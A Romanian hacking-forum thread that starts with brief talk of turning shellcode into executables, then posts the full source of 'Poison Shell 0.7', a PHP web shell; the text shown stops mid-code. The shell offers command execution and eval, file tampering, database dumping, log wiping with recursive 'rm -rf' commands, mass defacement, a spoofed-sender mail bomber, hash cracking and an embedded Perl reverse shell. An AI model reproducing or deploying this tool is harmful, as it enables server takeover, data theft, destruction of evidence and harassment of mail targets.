Jump to content
io.kent

Shellcode to Exe

By io.kent, in Programe hacking

Recommended Posts

io.kent Newbie

io.kent

Posted
Posted

code:

{******************************************************************************}
{** WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING  **}
{******************************************************************************}
{**                                                                          **}
{** The prototypes, declarations and information in this file has been       **}
{** compiled from various sources as well as through reverse engineering     **}
{** techniques. We make no guarantee as to the correctness of the contents.  **}
{** Caution is recommended, USE AT YOUR OWN RISK.                            **}
{**                                                                          **}
{******************************************************************************}

lam folosit de cateva ori si e foarte util

http://sandsprite.com/shellcode_2_exe.php

iDefense Cyber Intelligence, Threat Intelligence and Security - Verisign

pentru a analiza exploits e util sa treci shellcode in exe, script php numai copiat shellcode in final de exe sau ceva similar, exe e un loader de shellcode..

Link to comment
Share on other sites
Nytro Mentor

Nytro

Posted
Posted

Nu e foarte complicat sa "executi" un shellcode:

((void ())shellcode)();

Transformarea in exe se poate realiza prin-un exe "gol", doar cu headere, iar in sectiunea de cod - Entrypoint, se copiaza shellcode-ul. Nu gasesc momentan o utilitate magnifica pentru asa ceva dar na, probabil uneori poate fi util.

Link to comment
Share on other sites
io.kent Newbie

io.kent

Posted
  • Author
Posted (edited)

asa e si mai sunt metode, daca imi aduc bine aminte e ceva cu byte ..

dar e mai simplu asa cum zice nytro.

dar de acest

[php shell] poison shell 0.7

code:

<?php

/*

Poison Shell 0.7


Doddy Hackman (C) Doddy Hackman


Mail : lepuke[at]hotmail[com]
Blog : doddy-hackman.blogspot.com

*/

@session_start();

$username = "a";
$password = "a";

if (isset($_POST['user'])) {
if ($_POST['user'] == $username && $_POST['pass'] == $password) {
$_SESSION['loginh'] = "1";
}
}

if (isset($_GET['chaunow'])) {
@session_destroy();
}

if ($_SESSION['loginh'] == 1) {

if (isset($_GET['info'])) {
die(phpinfo());
}

if (isset($_POST['sessionew'])) {
@session_start();
if ($_SESSION[$_POST['sessionew']] = $_POST['valor']) {
echo "<script>alert('Session created');</script>";
} else {
echo "<script>alert('Error');</script>";
}
}


if(isset($_GET['bajardb'])) {

$tod = @mysql_connect($_GET['host'],$_GET['usuario'],$_GET['password']); 
mysql_select_db($_GET['bajardb']);

$resultado = mysql_query("SHOW TABLES FROM ".$_GET['bajardb']);

while ($tabla = mysql_fetch_row($resultado)) {
foreach($tabla as $indice => $valor) {

$todo.= "<br><br>".$valor."<br><br>";

$resultadox = mysql_query("SELECT * FROM ".$valor);

$todo.="<table border=1>";

for ($i=0;$i< mysql_num_fields($resultadox);$i++) {
$todo.="<th>".mysql_field_name($resultadox,$i)."</th>";
}
while($dat = mysql_fetch_row($resultadox)) {
$todo.="<tr>";
foreach($dat as $val) {
$todo.="<td >".$val."</td>";
}
}
$todo.="</tr></table>";
}	
}
@mysql_free_result($tod);
@header("Content-type: application/vnd-ms-excel; charset=iso-8859-1");
@header("Content-Disposition: attachment; filename=".date('d-m-Y').".xls");
echo $todo;  
exit(1);
}




if(isset($_GET['bajartabla'])) {
$tod = mysql_connect($_GET['host'],$_GET['usuario'],$_GET['password']) or die("<h1>Error</h1>");
mysql_select_db($_GET['condb']);
if(!empty($_GET['sentencia'])) {
$resultado =  mysql_query($_GET['sentencia']);
} else {
$resultado = mysql_query("SELECT * FROM ".$_GET['bajartabla']);
}
$todo.="<table border=1>";
for ($i=0;$i< mysql_num_fields($resultado);$i++) {
$todo.="<th>".mysql_field_name($resultado,$i)."</th>";
}
while($dat = mysql_fetch_row($resultado)) {
$todo.="<tr>";
foreach($dat as $val) {
$todo.="<td>".$val."</td>";
}
}
@mysql_free_result($tod);
$todo.="</tr></table>";
@header("Content-type: application/vnd-ms-excel; charset=iso-8859-1");
@header("Content-Disposition: attachment; filename=".date('d-m-Y').".xls");
echo $todo;  
exit(1);
}

if (isset($_GET['reload'])) {
$tipo = pathinfo($_GET['reload']);
echo '<meta http-equiv="refresh" content="0;URL=?dir='.$tipo['dirname'].'>';
exit(1);
}

function dame($file) {
return substr(sprintf('%o', fileperms($file)), -4);
}

if (isset($_GET['down'])) {
header("Content-Type: application/octet-stream");
header("Content-Disposition: attachment; filename=".basename($_GET['down']));
readfile($_GET['down']);
}

if (isset($_POST['cookienew'])) {
if (setcookie($_POST['cookienew'],$_POST['valor'])) {
echo "<script>alert('Cookie cREATED');</script>";
echo '<meta http-equiv="refresh" content="0;URL=?cookiemanager">';
} else {
echo "<script>alert('Error');</script>";
}
}


echo '<style type="text/css">


.main {
margin			: -287px 0px 0px -490px;
border			: White solid 1px;
BORDER-COLOR: #00FF00;
}


#pie {
position: absolute;
bottom: 0;
}

body,a:link {
background-color: #000000;
color:#00FF00;
Courier New;
cursor:crosshair;
font-size: small;
}

input,table.outset,table.bord,table,textarea,select {
font: normal 10px Verdana, Arial, Helvetica,
sans-serif;
background-color:black;color:#00FF00; 
border: solid 1px #00FF00;
border-color:#00FF00
}

a:link,a:visited,a:active {
color: #00FF00;
font: normal 10px Verdana, Arial, Helvetica,
sans-serif;
text-decoration: none;
}

</style>';

echo "<title>[+] PoisonShell (C) Doddy Hackman 2011 </title>";
echo "<table><tr><td class=main><br><h2>   PoisonShell   </h2><br></td><td class=main>
<b>System</b> : ".php_uname('s')." ".php_uname('r')." ".php_uname('v')."<br><b>Server</b> : ".$_SERVER['SERVER_SOFTWARE']."<br>";
echo "<b>IP</b> : ".$_SERVER['SERVER_ADDR']."      
<b>User</b> : uid=".getmyuid()." (".get_current_user().") gid=".getmygid()."      
<b>Path</b> : ".getcwd()."      
<b>Version PHP</b> : ".phpversion()."<br>";
if (ini_get('safe_mode')==0) {
echo "<b>Safe Mode</b> : OFF      ";	
} else {
echo "<b>Safe Mode</b> : ON      ";
}
if (get_magic_quotes_gpc() == "1" or get_magic_quotes_gpc() == "on") {
echo "<b>Magic Quotes</b> : ON      ";
} else {
echo "<b>Magic Quotes</b> : OFF      ";
}
exec("perl -h",$perl);
if ($perl) {
echo "<b>Perl</b> : ON      ";
} else {
echo "<b>Perl</b> : OFF      ";
}
exec("wget --help",$wget);
if ($wget) {
echo "<b>WGET</b> : ON      ";
} else {
echo "<b>WGET</b> : OFF      ";
}
exec("curl_version",$curl);
if ($curl) {
echo "<b>CURL</b> : ON      ";
} else {
echo "<b>CURL</b> : OFF      ";
}

echo "</tr></td></table><br>";

echo "

<table>
<td class=main><a href=?dir=>Navigate</a></td><td class=main><a href=?cmd=>CMD</a></td>
<td class=main><a href=?upload=>Upload</a></td><td class=main><a href=?base64=>Base64</a></td>
<td class=main><a href=?phpconsole=>Eval</a></td><td class=main><a href=?info=>phpinfo</a></td>
<td class=main><a href=?bomber=>Mailer</a></td><td class=main><a href=?md5crack=>MD5Crack</a></td>
<td class=main><a href=?backshell>BackShell</a></td><td class=main><a href=?mass=>MassDefacement</a></td>
<td class=main><a href=?logs=>CleanLogs</a></td><td class=main><a href=?ftp=>FTP</a></td>
<td class=main><a href=?sql=>SQL</a></td><td class=main><a href=?cookiemanager=>Cookies</a></td>
<td class=main><a href=?sessionmanager=>Session</a></td>
<td class=main><a href=?chau=>Kill</a></td>
</table><br><br>
";




if(isset($_GET['perms'])) {
echo "
<form action='' method=POST>
File : <input type=text name=archivo value=".$_GET['perms'].">
<br>
Perms : <input type=text name=perms value=".dame($_GET['perms'])."
<br><br>
<input type=submit name=cambiarperms value=Change>
</form>
";
}
if (isset($_POST['cambiarperms'])) {
if (chmod($_POST['archivo'],$_POST['perms'])) {
echo "<script>alert('cHANGED');</script>";
} else {
echo "<script>alert('Error');</script>";
}
echo "<br><br><font color=red><center><a href=?reload=".$_POST['archivo'].">Atras</a><br><br></font></center>";
}

if (isset($_GET['ren'])) {
echo "
<form action='' method=POST>
File : <input type=text name=nombre value=".$_GET['ren']."><br>
Change to : <input type=text name=cambio><br><BR>
<input type=submit name=cambios value=Change><BR>
</form>
";
}

if (isset($_POST['cambios'])) {
if (@rename($_POST['nombre'],$_POST['cambio'])) {
echo "<script>alert('Changed');</script>";
} else {
echo "<script>alert('Error');</script>";
}
echo "<br><br><font color=red><center><a href=?reload=".$_POST['cambios'].">Atras</a><br><br></font></center>";
}



if (isset($_POST['crear1'])) {
chdir($_POST['dir']);
if (fopen($_POST['crear1'],"w")) {
echo "<script>alert('File cREATED');</script>";
}else {
echo "<script>alert('Error');</script>";
}
echo "<br><br><font color=red><center><a href=?reload=".$_POST['dir'].">Atras</a><br><br></font></center>";
}

if (isset($_POST['crear2'])) {
chdir($_POST['dir']);
if (@mkdir($_POST['crear2'],777)) {
echo "<script>alert('Directory created');</script>";
} else {
echo "<script>alert('Error');</script>";
}
echo "<br><br><font color=red><center><a href=?reload=".$_POST['dir'].">Atras</a><br><br></font></center>";
}


if (isset($_GET['del'])) {
$tipo  = filetype($_GET['del']);
if ($tipo == "dir") {
if (rmdir($_GET['del'])) {
echo "<script>alert('Directory Deleted');</script>";
} else { 
echo "<script>alert('Error');</script>";
}
} else {
if (unlink($_GET['del'])) {
echo "<script>alert('File Deleted');</script>";
} else {
echo "<script>alert('Error');</script>";
}
}
echo "<br><br><font color=red><center><a href=?reload=".$_GET['del'].">Atras</a><br><br></font></center>";
}

if (isset($_GET ['copiar'])) {
echo '
<form action="" method=POST>
File : <input type=text name=archivo value='.$_GET['copiar'].'><br>
Copy to : <input type=text name=nuevo><br><br>
<input type=submit name=copiado value=Copy><BR>
</form>
';
}

if (isset($_POST['copiado'])) {
if (copy($_POST['archivo'],$_POST['nuevo'])) {
echo "<script>alert('OK');</script>";
} else {
echo "<script>alert('Error');</script>";
}
echo "<br><br><font color=red><center><a href=?reload=".$_POST['archivo'].">Atras</a><br><br></font></center>";
}

if (isset($_GET['open'])) {
echo "<form action='' method=POST>";
echo "<center>";
echo "<textarea cols=80 rows=40 name=code>";
$archivo = file($_GET['open']);
foreach($archivo as $n=>$sub) {
$texto = htmlspecialchars($sub);
echo $texto;
}
echo "</center></textarea>";
echo "<br><br><center><input type=submit value=Save name=modificar></center><br><br>";
echo "</form>";
}

if (isset($_POST['modificar'])) {
$modi = fopen($_GET['open'],'w+');
if ($yeah = fwrite($modi,$_POST['code'])) {
echo "<script>alert('OK');</script>";
} else {
echo "<script>alert('Error');</script>";
}
echo "<br><br><font color=red><center><a href=?reload=".$_GET['open'].">Atras</a><br><br></font></center>";
}


if (isset($_GET['dir'])) {
if ($_GET['dir']=="") {
$path = getcwd();
chdir($path);
$dir = dir($path);
} else {
$path = $_GET['dir'];
chdir($path);
$dir = dir($path);
}
echo "
<br><br>
<form action='' method=GET>
<b>Directory</b> : <input type=text name=dir value=".$path."><input type=submit name=ir value=Navegar>
</form>
<br><br>
<form action='' method=POST>
<b>New File</b> : <input type=text name=crear1><input type=hidden name=dir value=".$dir->path."><input type=submit value=Crear>
</form>
<form action='' method=POST>
<b>New Directory</b> : <input type=text name=crear2><input type=hidden name=dir value=".$dir->path."><input type=submit value=Crear>
</form><br><br>
";
$archivos = array('dir'=>array(),'file'=>array());
while ($archivo = $dir->read()) {
$ver = @filetype($path.'/'.$archivo) ;
if ($ver=="dir") {
$archivos['dir'][] = $path.'/'.$archivo;
} else {
$archivos['file'][] = $path.'/'.$archivo;
}
}
$dir->rewind();
echo "<br><b>Directory Found</b> : ".count($archivos['dir'])."<br>";
echo "<b>Files Found</b> : ".count($archivos['file'])."<br><br><br>";
echo "<table bgcolor=#00FF00 border=1>";
echo "<tr>";
foreach ($archivos['dir'] as $dirs) {
$dirsx = pathinfo($dirs);
echo "<td width=100><a href=?dir=".$dirs.">".$dirsx['basename']."</a></td>";
echo "<td width=100><a href=?ren=".$dirs.">Move</a></td>";
echo "<td width=100><a href=?del=".$dirs.">Delete</a></td>";
echo "<td width=100><a href=?perms=".$dirs.">Perms</a></td>";
echo "<td width=100>--</td>";
echo "<td width=100>--</td>";
echo "</tr><tr>";
}
foreach ($archivos['file'] as $files) {
$filex = pathinfo($files);
echo "<td width=100><a href=?open=".$files.">".$filex['basename']."</a></td>";
echo "<td width=100><a href=?ren=".$files.">Move</a></td>";
echo "<td width=100><a href=?del=".$files.">Delete</a></td>";
echo "<td width=100><a href=?perms=".$files.">Perms</a></td>";
echo "<td width=100><a href=?copiar=".$files.">Copy</a></td>";
echo "<td width=100><a href=?down=".$files.">Download</a></td>";
echo "</tr><tr>";
}
echo "</table>";
}


if (isset($_GET['cmd'])) {
echo '
<form action="" method=POST>
Command : <input type=text name=comando size=50><input type=submit name=ejecutar value=Now>
</form>
';
}
if (isset($_POST['ejecutar'])) {
echo '
<br><br>Command<br><br>
<fieldset>
'.$_POST['comando'].'</fieldset>
<br><br>Result<br><br><fieldset>';
if (!system($_POST['comando'])) {
echo "<script>alert('Error loading command');</script>";
echo "Error";
}
echo "</fieldset><br><br>";
}

if (isset($_GET['upload'])) {
echo "<center><h2>Upload files</h2></center><center><br><br><br>";
echo '
<form enctype="multipart/form-data" action="" method=POST>
File : <input type=file name=archivo><br><br>	
Directory : <input type=text name=destino value='.getcwd().'>
<input type=submit value=Upload><br>
</form>';
if (isset($_FILES['archivo'])) {
$subimos = basename($_FILES['archivo']['name']);
if (move_uploaded_file($_FILES['archivo']['tmp_name'],$subimos)) {
if (copy($subimos,$_POST['destino']."/".$subimos)) { 
unlink($subimos);
echo "<script>alert('File uploaded');</script>";
}
} else {
echo "<script>alert('Error');</script>";
}
}
}

if (isset($_GET['base64'])) {
echo '
<form action="" method=POST>
Encode : <input type=text name=code size=50><input type=submit name=codificar value=Encode>
</form>
<form action="" method=POST>
Decode : <input type=text name=decode size=50><input type=submit name=decodificar value=Decode>
</form>
';
}
if (isset($_POST['codificar'])) {
echo "<br><br>Text<br><br><fieldset>".$_POST['code']."</fieldset><br><br>Result<br><br><fieldset>";
echo base64_encode($_POST['code'])	;
echo "</fieldset><br><br>";
}

if (isset($_POST['decodificar'])) {
echo "<br><br>Text<br><br><fieldset>".$_POST['decode']."</fieldset><br><br>Result<br><br><fieldset>";
echo base64_decode($_POST['decode']);
echo "</fieldset><br><br>";
}


if (isset($_GET['phpconsole'])) {
echo '
<form action="" method=POST>
Code : <input type=text name=codigo size="70"><input type=submit name=cargar value=OK>
</form>
';
}
if (isset($_POST['cargar'])) {
echo "<br><br>Code<br><br>
<fieldset>
".$_POST['codigo']."
</fieldset>
<br><br>
Result<br><br>
<fieldset>";

eval($_POST['codigo']);
echo "</fieldset>
";
}




if (isset($_GET['logs'])) {
echo '
<br><br><center><h3>Zapper</h3>
<br><br>
<form action="" method=GET>
<input type=submit name=clean value=Start>
</form></center>
<br><br>
';
}

if (isset($_GET['clean'])) {

$paths = array("/var/log/lastlog", "/var/log/telnetd", "/var/run/utmp","/var/log/secure","/root/.ksh_history", "/root/.bash_history","/root/.bash_logut", "/var/log/wtmp", "/etc/wtmp","/var/run/utmp", "/etc/utmp", "/var/log", "/var/adm",
"/var/apache/log", "/var/apache/logs", "/usr/local/apache/logs","/usr/local/apache/logs", "/var/log/acct", "/var/log/xferlog",
"/var/log/messages/", "/var/log/proftpd/xferlog.legacy","/var/log/proftpd.xferlog", "/var/log/proftpd.access_log","/var/log/httpd/error_log", "/var/log/httpsd/ssl_log","/var/log/httpsd/ssl.access_log", "/etc/mail/access",
"/var/log/qmail", "/var/log/smtpd", "/var/log/samba","/var/log/samba.log.%m", "/var/lock/samba", "/root/.Xauthority","/var/log/poplog", "/var/log/news.all", "/var/log/spooler","/var/log/news", "/var/log/news/news", "/var/log/news/news.all",
"/var/log/news/news.crit", "/var/log/news/news.err", "/var/log/news/news.notice","/var/log/news/suck.err", "/var/log/news/suck.notice","/var/spool/tmp", "/var/spool/errors", "/var/spool/logs", "/var/spool/locks","/usr/local/www/logs/thttpd_log", "/var/log/thttpd_log","/var/log/ncftpd/misclog.txt", "/var/log/nctfpd.errs","/var/log/auth");

$comandos  = array('find / -name *.bash_history -exec rm -rf {} \;' , 'find / -name *.bash_logout -exec rm -rf {} \;','find / -name log* -exec rm -rf {} \;','find / -name  *.log -exec rm -rf {} \;','unset HISTFILE','unset SAVEHIST');

foreach($paths as $path) {
if(@unlink($path)) {
echo $path.": Deleted<br>";
}
}
echo "<br><br>";
foreach($comandos as $comando) {
echo "Loading command : ".$comando."<br>";
system($comando);
}
}


if(isset($_GET['mass'])) {
echo "
<form action='' method=POST>
Directory to start : <input type=text name=dir value=".getcwd()."><br><br>
Code : <input type=text name=codigo size=70>
<input type=submit name=def value=Start>
</form>
";
}
if (isset($_POST['def'])) {
juntar($_POST['dir'],$_POST['codigo']);
}
function juntar ($dira,$text) {
$dir= opendir($dira);
while (!is_bool($archivos = readdir($dir))) {
if ($archivos != "..") {
if ($archivos != ".")  {
if ($archivos != basename($_SERVER['PHP_SELF'])) {
if (@filetype($dira."/".$archivos) == dir) {
juntar($dira."/".$archivos,$text);
} else {
echo "Deface : ".$dira."/".$archivos."<br>";
$solo = fopen($dira."\\".$archivos,"w");
$solo = fwrite($solo,$text);	
fclose($solo);
}}}}}} 	


if (isset($_GET['chau'])) {
if ($_GET['chau'] == "fuckit") {
echo "<br><br><h3>Kapoom !!!</h3><br><br>";
//unlink(basename($_SERVER['PHP_SELF']));
} else {
echo "<br><br><font color=red><h3><center>Acceso Denegado</center></h3></font><br><br>";
}
}



if (isset($_GET['bomber'])) {
echo "
<form action='' method=POST>
Target : <input type=text name=idiot value=@hotmail.com><br>
Fake mail : <input type=text name=falso><br>
Fake name : <input type=text name=nombrefalso><br>
Subject : <input type=text name=asunto><br>
Count : <input type=text name=count value=1><br>
Message : <input type=text name=mensaje size=60><br><br>
<br><input type=submit name=bombers value=Now>
</form>";
}

if (isset($_POST['bombers'])) {

$need .="MIME-Version: 1.0\n";
$need .="Content-type: text/html ; charset=iso-8859-1\n";
$need .="MIME-Version: 1.0\n";
$need .="From: ".$_POST['nombrefalso']." <".$_POST['falso'].">\n";
$need .="To: ".$_POST['nombrefalso']."<".$_POST['falso'].">\n";
$need .="Reply-To:".$_POST['falso']."\n";
$need .="X-Priority: 1\n";
$need .="X-MSMail-Priority:Hight\n";
$need .="X-Mailer:Widgets.com Server";


echo "<br><br><br><center><h2>Result</h2></center><br><br>";

for ($i = 1; $i <= $_POST['count']; $i++) {
if(@mail($_POST['idiot'],$_POST['asunto'],$_POST['mensaje'],$need)) {
echo "[+] Message <b>$i</b> Send<br>";
flush();
} else {
echo "[+] Message <b>$i</b> not Send<br>";
}}}

if (isset($_GET['md5crack'])) {

echo "

<form action='' method=POST
<b>Hash</b> : <input type=text name=md5 size=50><br><br>
<b>Salt</b> : <input type=text name=salto size=50><br>
<br><h3>Wordlist</h3>
<textarea cols=80 rows=40 name=code></textarea> 
<br><br>
<input type=submit value=Crack>
</form>
";

}

if (isset($_POST['md5'])) {
echo "<br><br><fieldset>";
echo "[+] Starting the search<br><br>";

$total = explode("\n",$_POST['code']);

foreach ($total as $linea){

$linea = chop($linea);

if (!empty($_POST['salto'])) {
$test = md5($linea.$_POST['salto']);
} else {
$test = md5($linea);
}

if ($test == $_POST['md5']) {
echo "<br>[+] Hash Cracked : ".$_POST['md5'].":".$linea."<br><br>";
exit(1);
} else {
echo "[+] : ".$_POST['md5']." != ".$linea."<br>";
}
}
echo "<br>[+] Finished<br>";
echo "</fieldset>";
}

if (isset($_GET['cookiemanager'])) {
echo "<h2>Cookies</h2><br><br>";
echo "[+] <b>Cookies Found</b> : ".count($_COOKIE)."<br><br>";  

echo "
<br><BR><form action='' method=POST>
New cookie : <input type=text name=cookienew><BR>
Value : <input type=text name=valor><BR><br>
<input type=submit value=Create><BR><br><br>
</form><br>";


echo "<table>";
echo "<td class=main><b>Name</b></td><td class=main><b>Value</b></td><tr>";

if (count($_COOKIE) != 0) {
foreach  ($_COOKIE as $nombre=>$valor) {
echo "<td class=main>".$nombre."</td><td class=main>".$valor."</td><tr>";
}
echo "</table>";
}

echo "<br><br>";
}

if (isset($_GET['sessionmanager'])) {

@session_start();

echo "<h2>Session</h2><br><br>";
echo "[+] <b>Sessions Found</b> : ".count($_SESSION)."<br><br>";  


echo "
<br><BR><form action='' method=POST>
New session : <input type=text name=sessionew><BR>
Value : <input type=text name=valor><BR><br>
<input type=submit value=Create><BR><br><br>
</form><br>";


if (count($_SESSION) != 0) {

echo "<table>";
echo "<td class=main><b>Name</b></td><td class=main><b>Value</b></td><tr>";

foreach  ($_SESSION as $nombre=>$valor) {
echo "<td class=main>".$nombre."</td><td class=main>".$valor."</td><tr>";
}
echo "</table>";
}
}

if (isset($_GET['ftp'])) {
echo "<h2>FTP Manager</h2><br><br>";
echo "

<form action='' method=GET>
Server : <input type=text name=serverftp value=127.0.0.1><br>
User : <input type=text name=user value=doddy><br>
Pass : <input type=text name=pass value=123><br><br><br>
<input type=hidden name=diar value=/>
<input type=submit value=Connect><br><br>
</form>
";

}

if (isset($_GET['renamenow'])) {

echo "

<form action='' method=GET>
File : <input type=text name=renamenowx value=".$_GET['renamenow']."><br>
New name : <input type=text name=newname><br><br>
<input type=hidden name=serverftp value=".$_GET['serverftp'].">
<input type=hidden name=user value=".$_GET['user'].">
<input type=hidden name=pass value=".$_GET['pass'].">
<input type=hidden name=diar value=".$_GET['diar'].">
<input type=submit value=Rename>
</form>
";
exit(1);
}


if (isset($_GET['renamenowx'])) {

$enter = ftp_connect($_GET['serverftp']);
$dentro = ftp_login($enter,$_GET['user'],$_GET['pass']);

if (ftp_rename($enter,$_GET['renamenowx'],$_GET['newname'])) {
echo "<script>alert('Changed');</script>";
echo '<meta http-equiv="refresh" content="0;URL=?serverftp='.$_GET['serverftp']."&user=".$_GET['user']."&pass=".$_GET['pass']."&diar=".$_GET['diar'].'>';
} else {
echo "<script>alert('Error');</script>";
}
}



if (isset($_GET['deletenow'])) {

$enter = ftp_connect($_GET['serverftp']);
$dentro = ftp_login($enter,$_GET['user'],$_GET['pass']);

if ($_GET['controla'] == "dir") {
if (@ftp_rmdir($enter,$_GET['deletenow'])) {
echo "<script>alert('Directory Deleted');</script>";
echo '<meta http-equiv="refresh" content="0;URL=?serverftp='.$_GET['serverftp']."&user=".$_GET['user']."&pass=".$_GET['pass']."&diar=".$_GET['diar'].'>';
} else {
echo "<script>alert('Error');</script>";
}

} else {

if (@ftp_delete($enter, $_GET['deletenow'])) {
echo "<script>alert('File Deleted');</script>";
echo '<meta http-equiv="refresh" content="0;URL=?serverftp='.$_GET['serverftp']."&user=".$_GET['user']."&pass=".$_GET['pass']."&diar=".$_GET['diar'].'>';
} else {
echo "<script>alert('Error');</script>";
}

}
}


if (isset($_GET['permsdown'])) {

echo "<form action='' method=GET>
File : <input type=text name=filetochange value=".$_GET['permsdown'].">
Perms : <input type=text name=pe value=0777 >
<input type=hidden name=serverftp value=".$_GET['serverftp'].">
<input type=hidden name=user value=".$_GET['user'].">
<input type=hidden name=pass value=".$_GET['pass'].">
<input type=submit value=Change>
</form>";
exit(1);
}

if (isset($_GET['filetochange'])) {

$enter = ftp_connect($_GET['serverftp']);
$dentro = ftp_login($enter,$_GET['user'],$_GET['pass']);

if (@ftp_chmod($enter,$_GET['pe'],$_GET['filetochange'])) {
echo "<script>alert('Changed');</script>";
} else {
echo "<script>alert('Error');</script>";
}

}


if (isset($_GET['serverftp'])) {

if ($enter = @ftp_connect("127.0.0.1")) {
if ($dentro = @ftp_login($enter,"doddy","123")) {
echo "<br><b>[+] Connected to server</b><br>";
} else {
echo "<br><b>[-] Error in the login</b><br><br>";
} 

echo "<b>[+] ONline</b><br><br><br>";

echo "

<form action='' method=GET>
Directory : <input type=text name=diar value=";
if (empty($_GET['diar'])) {
echo ftp_pwd($enter);
} else {
echo $_GET['diar'];
}

echo ">
<input type=hidden name=serverftp value=".$_GET['serverftp'].">
<input type=hidden name=user value=".$_GET['user'].">
<input type=hidden name=pass value=".$_GET['pass'].">

<input type=submit value=Load>
</form>
<br><br>
<form action='' method=GET>
New directory : <input type=text name=newdirftp><input type=submit value=Load>
<input type=hidden name=serverftp value=".$_GET['serverftp'].">
<input type=hidden name=user value=".$_GET['user'].">
<input type=hidden name=pass value=".$_GET['pass'].">
<input type=hidden name=diar value=".$_GET['diar'].">
</form>
<br><br>

<br><br>";

if (isset($_GET['diar'])) {

$enter = ftp_connect($_GET['serverftp']);
$dentro = ftp_login($enter,$_GET['user'],$_GET['pass']);

if (empty($_GET['diar'])) {

if (!$lista = ftp_nlist($enter.".")) {
echo "<script>alert('Error loading directory');</script>";
exit(1);
}

} else {

if (!$lista = ftp_nlist($enter,$_GET['diar'])) {
echo "<script>alert('Error loading directory');</script>";
exit(1);
}

}
}

echo "<table>";
foreach ($lista as $ver) {
echo "<td class=main>".$ver."</td>";

if (ftp_size($enter,ftp_pwd($enter).$ver) == -1) {

echo "<td class=main><a href=?serverftp=".$_GET['serverftp']."&user=".$_GET['user']."&pass=".$_GET['pass']."&diar=".$ver.">Enter</a></td>";
echo "<td class=main><a href=?serverftp=".$_GET['serverftp']."&user=".$_GET['user']."&pass=".$_GET['pass']."&diar=".$_GET['diar']."&renamenow=".$ver.">Rename</a></td>";
echo "<td class=main><a href=?serverftp=".$_GET['serverftp']."&user=".$_GET['user']."&pass=".$_GET['pass']."&controla=dir&diar=".$_GET['diar']."&deletenow=".$ver.">Delete</a></td>";
echo "<td class=main><a href=?serverftp=".$_GET['serverftp']."&user=".$_GET['user']."&pass=".$_GET['pass']."&permsdown=".$ver.">Perms</a></td>";
echo "<td class=main>--</a></td><tr>";

} else {

echo "<td class=main><a href=?serverftp=".$_GET['serverftp']."&user=".$_GET['user']."&pass=".$_GET['pass']."&diar=".$ver.">--</a></td>";
echo "<td class=main><a href=?serverftp=".$_GET['serverftp']."&user=".$_GET['user']."&pass=".$_GET['pass']."&diar=".$_GET['diar']."&renamenow=".$ver.">Rename</a></td>";
echo "<td class=main><a href=?serverftp=".$_GET['serverftp']."&user=".$_GET['user']."&pass=".$_GET['pass']."&controla=file&diar=".$_GET['diar']."&deletenow=".$ver.">Delete</a></td>";
echo "<td class=main><a href=?serverftp=".$_GET['serverftp']."&user=".$_GET['user']."&pass=".$_GET['pass']."&permsdown=".$ver.">Perms</a></td>";
echo "<td class=main><a href=?serverftp=".$_GET['serverftp']."&user=".$_GET['user']."&pass=".$_GET['pass']."&diar=".$_GET['diar']."&downfile=".$ver.">Download</a></td><tr>";

}

}

echo "</table>";

} else {
echo "<b>[-] Error in the server</b><br><br>";
}
}


if (isset($_GET['downfile'])) {

$enter = ftp_connect($_GET['serverftp']);
$dentro = ftp_login($enter,$_GET['user'],$_GET['pass']);

$nuevo = fopen(basename($_GET['downfile']),'w');

if (ftp_fget($enter,$nuevo,$_GET['downfile'], FTP_ASCII, 0)) {
echo "<script>alert('File Download');</script>";
echo '<meta http-equiv="refresh" content="0;URL=?serverftp='.$_GET['serverftp']."&user=".$_GET['user']."&pass=".$_GET['pass']."&diar=".$_GET['diar'].'>';
} else {
echo "<script>alert('Error in the download');</script>";
}

ftp_close($enter);
fclose($nuevo);

}

if (isset($_GET['newdirftp'])) {

$enter = ftp_connect($_GET['serverftp']);
$dentro = ftp_login($enter,$_GET['user'],$_GET['pass']);

if (ftp_mkdir($enter,$_GET['diar'].$_GET['newdirftp'])) {
echo "<script>alert('Directory created');</script>";
echo '<meta http-equiv="refresh" content="0;URL=?serverftp='.$_GET['serverftp']."&user=".$_GET['user']."&pass=".$_GET['pass']."&diar=".$_GET['diar'].'>';
} else {
echo "<script>alert('Error');</script>";
}
}

if (isset($_GET['backshell'])) {

echo "

<form action='' method=GET>
IP : <input type=text name=ip value=".$_SERVER['REMOTE_ADDR']."><br>
Port : <input type=text name=port value=666><br><br>
Type : <select name=tipo>
<option>Perl</option>
</select>
<br><br><br>
<input type=submit value=Conectar>

";
}

if (isset($_GET['ip'])) {


if ($_GET['tipo']=="Perl") {

$code = ' 
#!usr/bin/perl
#Reverse Shell 0.1
#By Doddy H

use IO::Socket;

print "\n== -- Reverse Shell 0.1 - Doddy H 2010 -- ==\n\n";

unless (@ARGV == 2) { 
print "[Sintax] : $0 <host> <port>\n\n";
exit(1);
} else {
print "[+] Starting the connection\n";
print "[+] Enter in the system\n";
print "[+] Enjoy !!!\n\n";
conectar($ARGV[0],$ARGV[1]);
tipo();
}

sub conectar {

socket(REVERSE, PF_INET, SOCK_STREAM, getprotobyname("tcp"));
connect(REVERSE, sockaddr_in($_[1],inet_aton($_[0])));
open (STDIN,">&REVERSE");
open (STDOUT,">&REVERSE");
open (STDERR,">&REVERSE");
}

sub tipo {
print "\n[*] Reverse Shell Starting...\n\n";
if ($^O =~/Win32/ig) {
infowin();
system("cmd.exe");
} else {
infolinux();
system("export TERM=xterm;exec sh -i");
}
}

sub infowin {
print "[+] Domain Name : ".Win32::DomainName()."\n";
print "[+] OS Version : ".Win32::GetOSName()."\n";
print "[+] Username : ".Win32::LoginName()."\n\n\n";
}

sub infolinux {
print "[+] System information\n\n";
system("uname -a");
print "\n\n";
}

# ¿ The End ?

';

$de = $_SERVER["HTTP_USER_AGENT"];

if(eregi("Win",$de)){
if ($test =  fopen("back.pl","w")) {
echo "<br><br><b>[+] Shell Created</b><br>";
} else {
echo "<br><br><b>[-] Error creating the shell</b><br>";
}
} else {

if ($test = fopen("/tmp/back.pl","w")) {
echo "<br><br><b>[+] Shell Created</b><br>";
} else {
echo "<br><br><b>[-] Error creating the shell</b><br>";
}

}

if (fwrite($test,$code)) {

if(eregi("Win",$de)){
if (chmod("back.pl",0777)) {
echo "<b>[+] Perms Changed<br></b>";
} else {
echo "<b>[-] Not priviligies to changed permissions</b><br>";
}
echo "<b>[+] Loading Shell</b><br><br><br>";
echo "<fieldset>";
if (!system("perl back.pl ".$_GET['ip']. " ".$_GET['port'])) {
echo "<script>alert('Error Loading Shell');</script>";
}
echo "</fieldset>";
} else {
if (chmod("/tmp/back.pl",0777)) {
